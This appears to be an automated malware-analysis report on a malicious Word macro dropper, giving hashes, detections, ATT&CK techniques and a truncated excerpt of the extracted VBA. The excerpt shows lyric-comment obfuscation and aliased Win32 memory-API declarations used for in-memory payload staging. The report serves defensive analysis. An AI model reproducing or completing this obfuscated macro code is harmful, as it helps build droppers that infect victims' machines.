Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 318c27af2a760218…

MALICIOUS

Office (OLE)

Size: 175.0 KB
Created: 2016-10-04 13:50:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: 2d1382a041842b324fd6b76265c39d22
SHA-1: af0afeedc8f55605006deb355b89df68c0ac7bfd
SHA-256: 318c27af2a76021887363dc1571bd35630a4c32d0c048cb37628f08b4ce02981
Risk Score: 82

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6592057-0, indicating it is a dropper. The presence of VBA macros supports this classification, as macros are commonly used to download and execute additional malicious content. The macro code is obfuscated with filler comments (song lyrics) and random identifier names, and it declares Win32 API functions (HeapCreate, HeapAlloc, RtlMoveMemory, TlsAlloc) under those random aliases, a pattern consistent with staging and executing a secondary payload in memory.

Heuristics (3)

  • ClamAV: Doc.Dropper.Agent-6592057-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592057-0
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below are XMP/RDF metadata namespace identifiers of the kind embedded in image files, not network callbacks.
    • http://ns.adobe.com/xap/1.0/ (In document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (In document text, OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ (In document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (In document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (In document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (In document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (In document text, OLE body)
    • http://www.iec.ch (In document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7886 bytes
SHA-256: 68e04ae8fdd2951af98d803ea8eec468bee70eeaac9a91c15688f1199834731e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "acknowledgment"
'Where is my home and where am I going?
'When will I know and how will I know?
#If Win64 Then
'Like a lover turning into a friend
'Where is my home and where am I going?
Public  Declare PtrSafe Function italy Lib "kernel32" Alias "HeapCreate" (ByVal piroplasm As LongPtr, ByVal breastfed As LongPtr, ByVal obligatorily As LongPtr) As LongPtr
'And I don't know if it ever will mend
'Why do I feel like I'm in a hurry
Public Declare PtrSafe Function onesided Lib "kernel32" Alias "RemoveDirectoryA" (dendroaspis As LongPtr)
'Like a lover turning into a friend
'Why do I feel like I'm in a hurry
Public  Declare PtrSafe Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal competing As LongPtr, ByVal surviving As LongPtr, ByVal rudiments As LongPtr) As LongPtr
'How does the whole thing end?
'I want to believe in something I feel
Public Declare PtrSafe Function nondisposable Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'And I don't know if it ever will mend
'I had a lover who turned into a friend
Public Declare PtrSafe Function biannually Lib "user32" Alias "EndDialog" (ByVal jaded As LongPtr,nResult As LongPtr) As LongPtr
'Like a lover turning into a friend
'I had a lover who turned into a friend
Public Declare PtrSafe Function bloodlessly Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'When will I know and how will I know?
'Will I always be here spinning my wheels
Public  Declare PtrSafe Function malted Lib "kernel32" Alias _
"EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal hModule As Any, lParam As Any) As LongPtr
'I had a lover who turned into a friend
'When will I marry
Public Declare PtrSafe Function chemoreceptive Lib "user32" Alias "GetDC" (ByVal archtraitor As LongPtr) As LongPtr
'Or does misfortune have a hand in the deal
'Who will be king and who will be beggar?
Public  Declare PtrSafe Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (dishevel As Any, perm As Any, ByVal conjugate As LongPtr)
'Why do I cry for nothing sometimes
'I want to believe in a nurturing love

'I want to believe love has a chance to survive
'Why do I cry for nothing sometimes
#Else
'Nothing's for sure except growing old
'And I don't know if it ever will mend
Public Declare Function malted Lib "kernel32" Alias _
"EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal katmandu As Any, lParam As Any) As Long
'And I don't know if it ever will mend
'Somewhere a heart is getting broken again
Public Declare Function monitive Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'And I don't know if it ever will mend
'When will I know and how will I know?
Public Declare Function bakelite Lib "user32" Alias "GetDC" (chlorambucil As Long) As Long
'And not just a sacrifice
'Who will be king and who will be beggar?
Public Declare Function sledding Lib "kernel32" Alias "RemoveDirectoryA" (defecation As Long)
'I want to believe in something I feel
'Like a lover turning into a friend
Public Declare Function beast Lib "user32" Alias "EndDialog" (ByVal ophicleide As Long, killing As Long) As Long
'When will I know and how will I know?
'The dream to be as one
Public Declare Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (holder As Any, stemwinder As Any, ByVal anthropophagist As Long)
'When will I know and how will I know?
'When will I marry
Public Declare Function italy Lib "kernel32" Alias "HeapCreate" (ByVal unlined As Long, ByVal bedmate As Long, ByVal foulard As Long) As Long
'When will I have this mystery solved?
'Feels like a race and I'm out of time
Public Declare Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal acreage As Long, ByVal penguin As Long, ByVal housebreaking As Long) As Long
'I want to believe in a nurturing love
'The dream to be as one
Public Declare Function earless Lib "kernel32" Alias "TlsAlloc" () As Long
'The dream to be as one
'Nothing's for sure except growing old

'Why do I feel like I'm in a hurry
'The dream to be as one
#End If
'I want to believe love has a chance to survive
... (truncated)